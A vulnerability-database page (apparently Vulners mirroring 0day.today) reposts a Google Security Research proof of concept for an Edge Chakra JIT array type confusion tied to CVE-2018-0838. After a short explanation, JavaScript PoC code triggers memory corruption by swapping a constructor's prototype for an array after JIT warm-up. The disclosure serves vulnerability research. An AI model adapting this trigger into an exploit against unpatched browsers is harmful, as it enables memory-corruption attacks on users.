Lucene search
Microsoft Edge Chakra JIT - NewScObjectNoCtor Array Type Confusion Exploit
đď¸Â 15 Feb 2018 00:00:00Reported by Google Security ResearchType 
 zdtđ 0day.todayđ 38 Views
Microsoft Edge Chakra JIT - NewScObjectNoCtor Array Type Confusion Exploi
Show more
| Reporter | Title | Published | Views | Family All 106 |
|---|---|---|---|---|
 | Microsoft Edge Chakra JIT NewScObjectNoCtor Array Type Confusion | 15 Feb 201800:00 | â | packetstorm |
 | Microsoft Edge Scripting Engine CVE-2018-0838 Remote Memory Corruption Vulnerability | 13 Feb 201800:00 | â | symantec |
 | Microsoft Edge Scripting Engine Memory Corruption (CVE-2018-0838) | 13 Feb 201800:00 | â | checkpoint_advisories |
 | Scripting Engine Memory Corruption Vulnerability | 13 Feb 201808:00 | â | mscve |
 | CVE-2018-0838 | 15 Feb 201802:29 | â | nvd |
| CVE-2018-0857 | 15 Feb 201802:29 | â | nvd |
| CVE-2018-0836 | 15 Feb 201802:29 | â | nvd |
| CVE-2018-0856 | 15 Feb 201802:29 | â | nvd |
| CVE-2018-0858 | 15 Feb 201802:29 | â | nvd |
| CVE-2018-0861 | 15 Feb 201802:29 | â | nvd |
10
/*
This is similar to the previous issues 1457, 1459 (MSRC 42551, MSRC 42552).
If a JavaScript function is used as a consturctor, it sets the new object's "__proto__" to its "prototype". The JIT compiler uses NewScObjectNoCtor instructions to perform it, but those instructions are not checked by CheckJsArrayKills which is used to validate the array information.
PoC:
*/
function inlinee() {
}
function opt(arr) {
arr[0] = 1.1;
new inlinee();
arr[0] = 2.3023e-320;
}
function main() {
let arr = [1.1];
for (let i = 0; i < 10000; i++) {
inlinee.prototype = {};
opt(arr);
}
inlinee.prototype = arr;
opt(arr);
print(arr);
}
main();
# 0day.today [2018-03-14] #Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo15 Feb 2018 00:00Current
7.5High risk
Vulners AI Score7.5
EPSS0.796